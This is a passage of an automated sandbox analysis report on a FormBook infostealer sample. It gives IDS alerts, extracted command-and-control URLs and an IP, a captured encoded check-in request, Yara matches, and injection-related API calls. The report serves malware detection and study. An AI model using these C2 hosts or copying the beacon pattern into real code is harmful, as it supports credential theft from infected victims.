Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop esi	20_2_02F272CB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi	20_2_02F27D5B

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 5.79.68.101:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 5.79.68.101:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 5.79.68.101:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.containerflippers.com/np0c/

Source: global traffic

HTTP traffic detected: GET /np0c/?iN=5jalxB&a0DTBtU=a9fK2iRL7rM/iNgaQ8e4NUwl6BbikcR8OekOj0TYIdin2efeiFW0Z5kC5Xa/O1Kzq37GlajMhw== HTTP/1.1Host: www.driplockerstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.driplockerstore.com

Source: 9thuIDnsFV.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 9thuIDnsFV.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: 9thuIDnsFV.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 9thuIDnsFV.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: 9thuIDnsFV.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 9thuIDnsFV.exe, 00000001.00000003.330013890.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: 9thuIDnsFV.exe, 00000001.00000003.329336409.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 9thuIDnsFV.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 9thuIDnsFV.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: 9thuIDnsFV.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: 9thuIDnsFV.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: wlanext.exe, 00000014.00000002.599683459.0000000003D9F000.00000004.00000001.sdmp	String found in binary or memory: http://survey-smiles.com
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.336179079.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: explorer.exe, 0000000E.00000000.465503164.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com.
Source: 9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comTC
Source: 9thuIDnsFV.exe, 00000001.00000003.333788508.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comaF
Source: 9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comal
Source: 9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comams
Source: 9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comc
Source: 9thuIDnsFV.exe, 00000001.00000003.334310160.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comces
Source: 9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comcr
Source: 9thuIDnsFV.exe, 00000001.00000003.334264597.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.come
Source: 9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comes
Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comexc
Source: 9thuIDnsFV.exe, 00000001.00000003.334215573.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comic
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comlt
Source: 9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.como.
Source: 9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comopsz
Source: 9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comroa
Source: 9thuIDnsFV.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: 9thuIDnsFV.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 9thuIDnsFV.exe, 00000001.00000003.341157570.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers#
Source: 9thuIDnsFV.exe, 00000001.00000003.339414645.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers$
Source: 9thuIDnsFV.exe, 00000001.00000003.338972632.000000000616B000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338849647.0000000006171000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 9thuIDnsFV.exe, 00000001.00000003.340799548.000000000618E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 9thuIDnsFV.exe, 00000001.00000003.339998468.000000000618E000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.339943360.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 9thuIDnsFV.exe, 00000001.00000003.339513065.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers5
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 9thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersa
Source: 9thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersers5
Source: 9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersp
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn6
Source: 9thuIDnsFV.exe, 00000001.00000003.332290487.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnMic
Source: 9thuIDnsFV.exe, 00000001.00000003.332056051.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnht
Source: 9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnld
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 9thuIDnsFV.exe, 00000001.00000003.342672431.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmm
Source: 9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.k)
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr-c(
Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.krtp
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 9thuIDnsFV.exe	String found in binary or memory: http://www.opera.com0
Source: 9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comG
Source: 9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comM
Source: 9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krFc
Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krs-czom
Source: explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 9thuIDnsFV.exe, 00000001.00000003.333190214.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com-jpL
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 9thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.341292306.0000000006177000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: 9thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de0
Source: 9thuIDnsFV.exe, 00000001.00000003.341330812.0000000006178000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de?
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cncr
Source: 9thuIDnsFV.exe, 00000001.00000003.333587115.000000000616D000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cnr-fC
Source: 9thuIDnsFV.exe	String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00419D60 NtCreateFile,	10_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00419E10 NtReadFile,	10_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00419E90 NtClose,	10_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00419F40 NtAllocateVirtualMemory,	10_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00419D5A NtCreateFile,	10_2_00419D5A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00419DB2 NtCreateFile,	10_2_00419DB2
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00419E8A NtClose,	10_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E99A0 NtCreateSection,LdrInitializeThunk,	10_2_019E99A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E95D0 NtClose,LdrInitializeThunk,	10_2_019E95D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_019E9910
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9540 NtReadFile,LdrInitializeThunk,	10_2_019E9540
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E98F0 NtReadVirtualMemory,LdrInitializeThunk,	10_2_019E98F0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9840 NtDelayExecution,LdrInitializeThunk,	10_2_019E9840
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_019E9860
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9780 NtMapViewOfSection,LdrInitializeThunk,	10_2_019E9780
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E97A0 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_019E97A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9710 NtQueryInformationToken,LdrInitializeThunk,	10_2_019E9710
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E96E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_019E96E0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9A00 NtProtectVirtualMemory,LdrInitializeThunk,	10_2_019E9A00
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9A20 NtResumeThread,LdrInitializeThunk,	10_2_019E9A20
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9A50 NtCreateFile,LdrInitializeThunk,	10_2_019E9A50
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9660 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_019E9660
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E99D0 NtCreateProcessEx,	10_2_019E99D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E95F0 NtQueryInformationFile,	10_2_019E95F0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019EAD30 NtSetContextThread,	10_2_019EAD30
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9520 NtWaitForSingleObject,	10_2_019E9520
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9950 NtQueueApcThread,	10_2_019E9950
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9560 NtWriteFile,	10_2_019E9560
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E98A0 NtWriteVirtualMemory,	10_2_019E98A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9820 NtEnumerateKey,	10_2_019E9820
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019EB040 NtSuspendThread,	10_2_019EB040
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019EA3B0 NtGetContextThread,	10_2_019EA3B0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9FE0 NtCreateMutant,	10_2_019E9FE0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019EA710 NtOpenProcessToken,	10_2_019EA710
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9B00 NtSetValueKey,	10_2_019E9B00
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9730 NtQueryVirtualMemory,	10_2_019E9730
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9770 NtSetInformationFile,	10_2_019E9770
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019EA770 NtOpenThread,	10_2_019EA770
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9760 NtOpenProcess,	10_2_019E9760
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9A80 NtOpenDirectoryObject,	10_2_019E9A80
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E96D0 NtCreateKey,	10_2_019E96D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9610 NtEnumerateValueKey,	10_2_019E9610
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9A10 NtQuerySection,	10_2_019E9A10
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9650 NtQueryValueKey,	10_2_019E9650
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E9670 NtQueryInformationProcess,	10_2_019E9670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F29E90 NtClose,	20_2_02F29E90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F29E10 NtReadFile,	20_2_02F29E10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F29F40 NtAllocateVirtualMemory,	20_2_02F29F40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F29D60 NtCreateFile,	20_2_02F29D60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F29E8A NtClose,	20_2_02F29E8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F29DB2 NtCreateFile,	20_2_02F29DB2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F29D5A NtCreateFile,	20_2_02F29D5A

Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Code function: 1_2_0322C224	1_2_0322C224
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Code function: 1_2_0322E5E2	1_2_0322E5E2
